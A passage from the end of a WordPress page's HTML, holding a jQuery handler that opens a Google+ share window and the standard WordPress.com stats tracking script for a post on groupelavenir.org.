			jQuery( document.body ).on( 'click', 'a.share-google-plus-1', function() {
				// If there's another sharing window open, close it.
				if ( 'undefined' !== typeof windowOpen ) {
					windowOpen.close();
				}
				windowOpen = window.open( jQuery( this ).attr( 'href' ), 'wpcomgoogle-plus-1', 'menubar=1,resizable=1,width=480,height=550' );
				return false;
			});
</script>

<!-- JS generated by theme -->

<script>
    
</script>

<script type='text/javascript' src='https://stats.wp.com/e-201836.js' async='async' defer='defer'></script>
<script type='text/javascript'>
	_stq = window._stq || [];
	_stq.push([ 'view', {v:'ext',j:'1:6.3.3',blog:'149877604',post:'51307',tz:'1',srv:'groupelavenir.org'} ]);
	_stq.push([ 'clickTrackerInit', '149877604', '51307' ]);
</script>
</body>
</html>